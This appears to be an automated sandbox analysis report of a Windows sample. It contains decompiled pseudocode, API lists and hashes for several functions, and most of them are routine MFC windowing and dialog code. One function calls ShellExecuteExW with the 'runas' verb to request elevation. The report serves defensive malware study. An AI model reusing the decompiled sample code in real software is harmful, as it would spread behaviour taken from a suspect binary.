                                                                                                                            0x0040e4e0
                                                                                                                            0x0040e4e3
                                                                                                                            0x0040e4f0
                                                                                                                            0x0040e4f0

                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,00000000,?,?,?,00000000,0040E820,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E3F0
                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,00000000,0040E820,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E446
                                                                                                                            • GlobalHandle.KERNEL32(?), ref: 0040E44F
                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,00000000,0040E820,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E458
                                                                                                                            • GlobalReAlloc.KERNEL32 ref: 0040E46F
                                                                                                                            • GlobalHandle.KERNEL32(?), ref: 0040E481
                                                                                                                            • GlobalLock.KERNEL32 ref: 0040E488
                                                                                                                            • LeaveCriticalSection.KERNEL32(00000008,?,?,?,00000000,0040E820,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E492
                                                                                                                            • GlobalLock.KERNEL32 ref: 0040E49E
                                                                                                                            • _memset.LIBCMT ref: 0040E4B7
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,4917EADC), ref: 0040E4E3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 496899490-0
                                                                                                                            • Opcode ID: e7b86f6f9b91edd4e430383ddc4d32cde45535dd83fb4eaf8d4da136978937f9
                                                                                                                            • Instruction ID: 6a9f9948ad1ce1543e0ec9f573cbabfc9c6b2c3477ac4d88e26c9340527e3b0a
                                                                                                                            • Opcode Fuzzy Hash: e7b86f6f9b91edd4e430383ddc4d32cde45535dd83fb4eaf8d4da136978937f9
                                                                                                                            • Instruction Fuzzy Hash: CC319C712007059FD7249F36DC49A2B77E9FB44305B00493EF996E3691EB39F9148B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B8A5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E0040B8A5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				long _t39;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E0041E9B4(E004314B8, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E0040A17C(1, _t64, _t71,  *(_t71 + 0x14));
					E0040B7B9(_t60, E0040A17C(1, _t64, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E0040B82F(1, _t64, _t66, E0040A17C(1, _t64, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								_t39 = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14)); // executed
								 *(_t71 - 0x14) = _t39;
							} else {
								E00408EC6(E0040A17C(1, _t64, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E0040A751(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E0041EA59( *(_t71 - 0x14));
			}














                                                                                                                            0x0040b8a5
                                                                                                                            0x0040b8a5
                                                                                                                            0x0040b8a5
                                                                                                                            0x0040b8ac
                                                                                                                            0x0040b8b1
                                                                                                                            0x0040b8b4
                                                                                                                            0x0040b8bb
                                                                                                                            0x0040b8c1
                                                                                                                            0x0040b8c5
                                                                                                                            0x0040b8c9
                                                                                                                            0x0040b8d1
                                                                                                                            0x0040b8d2
                                                                                                                            0x0040b8d5
                                                                                                                            0x0040b97e
                                                                                                                            0x0040b990
                                                                                                                            0x00000000
                                                                                                                            0x0040b8db
                                                                                                                            0x0040b8db
                                                                                                                            0x0040b8de
                                                                                                                            0x0040b976
                                                                                                                            0x0040b995
                                                                                                                            0x0040b997
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040b8e0
                                                                                                                            0x0040b8e0
                                                                                                                            0x0040b8e3
                                                                                                                            0x0040b93c
                                                                                                                            0x0040b944
                                                                                                                            0x0040b952
                                                                                                                            0x00000000
                                                                                                                            0x0040b8e5
                                                                                                                            0x0040b8ea
                                                                                                                            0x0040b999
                                                                                                                            0x0040b9a6
                                                                                                                            0x0040b9ac
                                                                                                                            0x0040b8f0
                                                                                                                            0x0040b901
                                                                                                                            0x0040b91e
                                                                                                                            0x0040b926
                                                                                                                            0x0040b926
                                                                                                                            0x0040b8ea
                                                                                                                            0x0040b8e3
                                                                                                                            0x0040b8de
                                                                                                                            0x0040b933

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0040B8AC
                                                                                                                            • GetPropA.USER32 ref: 0040B8BB
                                                                                                                            • CallWindowProcA.USER32 ref: 0040B915
                                                                                                                              • Part of subcall function 0040A751: GetWindowRect.USER32 ref: 0040A779
                                                                                                                              • Part of subcall function 0040A751: GetWindow.USER32(?,00000004), ref: 0040A796
                                                                                                                            • SetWindowLongA.USER32 ref: 0040B93C
                                                                                                                            • RemovePropA.USER32 ref: 0040B944
                                                                                                                            • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 0040B94B
                                                                                                                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 0040B952
                                                                                                                              • Part of subcall function 00408EC6: GetWindowRect.USER32 ref: 00408ED2
                                                                                                                            • CallWindowProcA.USER32 ref: 0040B9A6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                            • String ID: AfxOldWndProc423
                                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                                            • Opcode ID: edf0c6614375bec33288a8967ba41598809bcaba5517c257f55ed0218222a5ad
                                                                                                                            • Instruction ID: 920a3150cb2d36ca6a0d7a0c3de5707b468beba51b3bd5c780e4ea8098614957
                                                                                                                            • Opcode Fuzzy Hash: edf0c6614375bec33288a8967ba41598809bcaba5517c257f55ed0218222a5ad
                                                                                                                            • Instruction Fuzzy Hash: 7C314371800216ABCB01AFA5DD49DFF7A78EF09301F00513AFA01B51A1CB399A119BAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404D4C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 310 404d4c-404d62 call 41e9b4 313 404d64-404d6c call 40706d 310->313 314 404d6f-404d93 call 40706d call 40ca66 * 2 310->314 313->314 323 404dc0 314->323 324 404d95-404da5 314->324 325 404dc3-404dc5 323->325 327 404da7-404da9 324->327 329 404dae-404dbe 324->329 325->327 328 404dc7-404dfc call 40e967 call 40db69 call 417fd6 325->328 330 404f34-404f39 call 41ea59 327->330 340 404e32-404e34 328->340 341 404dfe-404e00 328->341 329->325 343 404e36-404e68 call 417f9f call 417efd call 417c35 call 417c27 340->343 344 404e75-404e88 call 40bc3c 340->344 342 404e02-404e0c GetSystemMetrics 341->342 341->343 342->344 345 404e0e-404e26 call 404d24 342->345 343->344 369 404e6a-404e73 GlobalLock 343->369 353 404e8a-404e8c 344->353 354 404e8e 344->354 345->344 356 404e28-404e2d 345->356 357 404e91-404ed6 CreateDialogIndirectParamA call 402c55 353->357 354->357 356->340 359 404e2f 356->359 365 404ef0-404ef7 call 40a224 357->365 366 404ed8-404ee3 357->366 359->340 373 404f03-404f05 365->373 374 404ef9-404efb 365->374 366->365 372 404ee5-404ee8 366->372 369->344 372->365 375 404f16-404f19 373->375 376 404f07-404f0b 373->376 374->373 378 404f1b-404f27 GlobalUnlock GlobalFree 375->378 379 404f2d-404f31 375->379 376->375 377 404f0d-404f14 DestroyWindow 376->377 377->375 378->379 379->330
                                                                                                                            C-Code - Quality: 97%
                                                                                                                            			E00404D4C(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				struct HWND__* _t76;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E0041E9B4(E00431239, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E0040706D(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E0040706D(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E0040CA66(_t103, _t104, 0, _t129, _t136, 0x10); // executed
				E0040CA66(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E0041EA59(_t65);
					}
					E0040DB69(_t132 - 0x1c, E0040E967());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E00417FD6(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x4444bc; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E0040BC3C(_t103, 0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t76 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E004047A5, 0); // executed
							_t131 = _t76;
							E00402C55( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E0040A224(_t103, 0, _t131, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131); // executed
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E00417F9F(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E00417EFD(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E00417C35(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E00417C27(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E00404D24(_t103, _t132 - 0x1c, 0, _t130, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

















                                                                                                                            0x00404d4c
                                                                                                                            0x00404d4c
                                                                                                                            0x00404d4c
                                                                                                                            0x00404d4c
                                                                                                                            0x00404d53
                                                                                                                            0x00404d58
                                                                                                                            0x00404d5a
                                                                                                                            0x00404d5f
                                                                                                                            0x00404d62
                                                                                                                            0x00404d6c
                                                                                                                            0x00404d6c
                                                                                                                            0x00404d74
                                                                                                                            0x00404d79
                                                                                                                            0x00404d7c
                                                                                                                            0x00404d7f
                                                                                                                            0x00404d82
                                                                                                                            0x00404d8c
                                                                                                                            0x00404d93
                                                                                                                            0x00404dc0
                                                                                                                            0x00404dc3
                                                                                                                            0x00404dc3
                                                                                                                            0x00404dc5
                                                                                                                            0x00404da7
                                                                                                                            0x00404da7
                                                                                                                            0x00404f34
                                                                                                                            0x00404f39
                                                                                                                            0x00404f39
                                                                                                                            0x00404dd0
                                                                                                                            0x00404dde
                                                                                                                            0x00404de2
                                                                                                                            0x00404def
                                                                                                                            0x00404df4
                                                                                                                            0x00404dfa
                                                                                                                            0x00404dfc
                                                                                                                            0x00404e32
                                                                                                                            0x00404e32
                                                                                                                            0x00404e34
                                                                                                                            0x00404e75
                                                                                                                            0x00404e75
                                                                                                                            0x00404e79
                                                                                                                            0x00404e7e
                                                                                                                            0x00404e83
                                                                                                                            0x00404e86
                                                                                                                            0x00404e88
                                                                                                                            0x00404e8e
                                                                                                                            0x00404e8a
                                                                                                                            0x00404e8a
                                                                                                                            0x00404e8a
                                                                                                                            0x00404e9c
                                                                                                                            0x00404ea8
                                                                                                                            0x00404eaa
                                                                                                                            0x00404eaf
                                                                                                                            0x00404ed1
                                                                                                                            0x00404ed4
                                                                                                                            0x00404ed6
                                                                                                                            0x00404ede
                                                                                                                            0x00404ee1
                                                                                                                            0x00404ee3
                                                                                                                            0x00404eea
                                                                                                                            0x00404eea
                                                                                                                            0x00404ee3
                                                                                                                            0x00404ef0
                                                                                                                            0x00404ef5
                                                                                                                            0x00404ef7
                                                                                                                            0x00404efd
                                                                                                                            0x00404efd
                                                                                                                            0x00404f03
                                                                                                                            0x00404f05
                                                                                                                            0x00404f07
                                                                                                                            0x00404f0b
                                                                                                                            0x00404f0e
                                                                                                                            0x00404f14
                                                                                                                            0x00404f14
                                                                                                                            0x00404f14
                                                                                                                            0x00404f0b
                                                                                                                            0x00404f16
                                                                                                                            0x00404f19
                                                                                                                            0x00404f1e
                                                                                                                            0x00404f27
                                                                                                                            0x00404f27
                                                                                                                            0x00404f2f
                                                                                                                            0x00404f31
                                                                                                                            0x00404f31
                                                                                                                            0x00404f31
                                                                                                                            0x00000000
                                                                                                                            0x00404f31
                                                                                                                            0x00404e36
                                                                                                                            0x00404e3a
                                                                                                                            0x00404e45
                                                                                                                            0x00404e49
                                                                                                                            0x00404e59
                                                                                                                            0x00404e5c
                                                                                                                            0x00404e60
                                                                                                                            0x00404e65
                                                                                                                            0x00404e68
                                                                                                                            0x00404e73
                                                                                                                            0x00404e73
                                                                                                                            0x00000000
                                                                                                                            0x00404e68
                                                                                                                            0x00404dfe
                                                                                                                            0x00404e00
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404e0a
                                                                                                                            0x00404e0c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404e16
                                                                                                                            0x00404e1d
                                                                                                                            0x00404e22
                                                                                                                            0x00404e24
                                                                                                                            0x00404e26
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404e28
                                                                                                                            0x00404e2d
                                                                                                                            0x00404e2f
                                                                                                                            0x00404e2f
                                                                                                                            0x00000000
                                                                                                                            0x00404e2d
                                                                                                                            0x00404d9a
                                                                                                                            0x00404da5
                                                                                                                            0x00404dbc
                                                                                                                            0x00000000
                                                                                                                            0x00404dbc
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00404D53
                                                                                                                            • GetSystemMetrics.USER32 ref: 00404E04
                                                                                                                            • GlobalLock.KERNEL32 ref: 00404E6D
                                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,004047A5,00000000), ref: 00404E9C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                            • String ID: MS Shell Dlg
                                                                                                                            • API String ID: 1736106359-76309092
                                                                                                                            • Opcode ID: 2c1b289b21883f1ae95786475a84cb08450ea46b97f1ffe55403e812d2468782
                                                                                                                            • Instruction ID: b6acd616c1ab209f748ee9940af1b2bba0203db990b01868d511807bf1db0e74
                                                                                                                            • Opcode Fuzzy Hash: 2c1b289b21883f1ae95786475a84cb08450ea46b97f1ffe55403e812d2468782
                                                                                                                            • Instruction Fuzzy Hash: D2518E709002059BCF11EFA4C8859AEBBB4AF94315F24457AF652B72D1DB388A81CB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401D00 Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 33COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 380 401d00-401d89 call 41ec90 ShellExecuteExW call 41d773 384 401d8e-401d91 380->384
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E00401D00(void* __ebx, intOrPtr __esi, void* __eflags) {
				signed int _v4;
				short _v6;
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _v64;
				char _v72;
				void* _v76;
				signed int _t18;
				int _t23;
				void* _t31;
				signed int _t33;

				_t33 =  &_v76;
				_t18 =  *0x441590; // 0x4917eadc
				_v4 = _t18 ^ _t33;
				E0041EC90(_t31,  &_v72, 0, 0x38);
				_t34 = _t33 + 0xc;
				_v64 =  &_v16;
				_v76 = 0x3c;
				_v72 = 0x440;
				_v56 = 0x438888;
				_v48 = 1;
				_v60 = __esi;
				_v16 = 0x72;
				_v14 = 0x75;
				_v12 = 0x6e;
				_v10 = 0x61;
				_v8 = 0x73;
				_v6 = 0;
				_t23 = ShellExecuteExW(_t33 + 0xc); // executed
				return E0041D773(_t23, __ebx, _v8 ^ _t34, _t34, _t31, __esi);
			}




















                                                                                                                            0x00401d00
                                                                                                                            0x00401d03
                                                                                                                            0x00401d0a
                                                                                                                            0x00401d17
                                                                                                                            0x00401d25
                                                                                                                            0x00401d2b
                                                                                                                            0x00401d33
                                                                                                                            0x00401d3b
                                                                                                                            0x00401d43
                                                                                                                            0x00401d4b
                                                                                                                            0x00401d53
                                                                                                                            0x00401d57
                                                                                                                            0x00401d5e
                                                                                                                            0x00401d65
                                                                                                                            0x00401d6c
                                                                                                                            0x00401d73
                                                                                                                            0x00401d7a
                                                                                                                            0x00401d81
                                                                                                                            0x00401d91

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExecuteShell_memset
                                                                                                                            • String ID: <$a$n$r$s$u
                                                                                                                            • API String ID: 2124839036-1436777364
                                                                                                                            • Opcode ID: 8506d7506178286733cf2adf8c80aee8e37171397d35c5e3ad79db2df45ab0da
                                                                                                                            • Instruction ID: 730fbeabf21caf7654d931f5b8b47f5a1fdd78761fd2cd91954194854b6c0d2d
                                                                                                                            • Opcode Fuzzy Hash: 8506d7506178286733cf2adf8c80aee8e37171397d35c5e3ad79db2df45ab0da
                                                                                                                            • Instruction Fuzzy Hash: 8901DAB05183009BD314DF14D44965BBBF4BF89788F405C1DF6884B261E7BA9548CB9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041807E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041807E(void* __ecx) {
				int _t5;
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t19 + 8)) = _t5;
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x444468 = GetSystemMetrics(2) + 1;
				 *0x44446c = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}






                                                                                                                            0x00418089
                                                                                                                            0x0041808b
                                                                                                                            0x0041808f
                                                                                                                            0x00418096
                                                                                                                            0x0041809e
                                                                                                                            0x004180a8
                                                                                                                            0x004180b9
                                                                                                                            0x004180c3
                                                                                                                            0x004180cb
                                                                                                                            0x004180d7

                                                                                                                            APIs
                                                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 0041808B
                                                                                                                            • GetSystemMetrics.USER32 ref: 00418092
                                                                                                                            • GetSystemMetrics.USER32 ref: 00418099
                                                                                                                            • GetSystemMetrics.USER32 ref: 004180A3
                                                                                                                            • GetDC.USER32(00000000), ref: 004180AD
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 004180BE
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004180C6
                                                                                                                            • ReleaseDC.USER32 ref: 004180CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1031845853-0
                                                                                                                            • Opcode ID: 55b76f02c157654b8dbfbb8c92d1f91da00c15603bb52c588f5e34c2bc64d97e
                                                                                                                            • Instruction ID: 1049f93b713445e10d7550220b0dae2248eb4d6338f315bbc062d6f4977ff77e
                                                                                                                            • Opcode Fuzzy Hash: 55b76f02c157654b8dbfbb8c92d1f91da00c15603bb52c588f5e34c2bc64d97e
                                                                                                                            • Instruction Fuzzy Hash: B1F03071A40704AEE7206F729C4AF27BBB4EBD1B62F01443AE6418B2D0D6B9D9058F54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040CA66 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 234COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
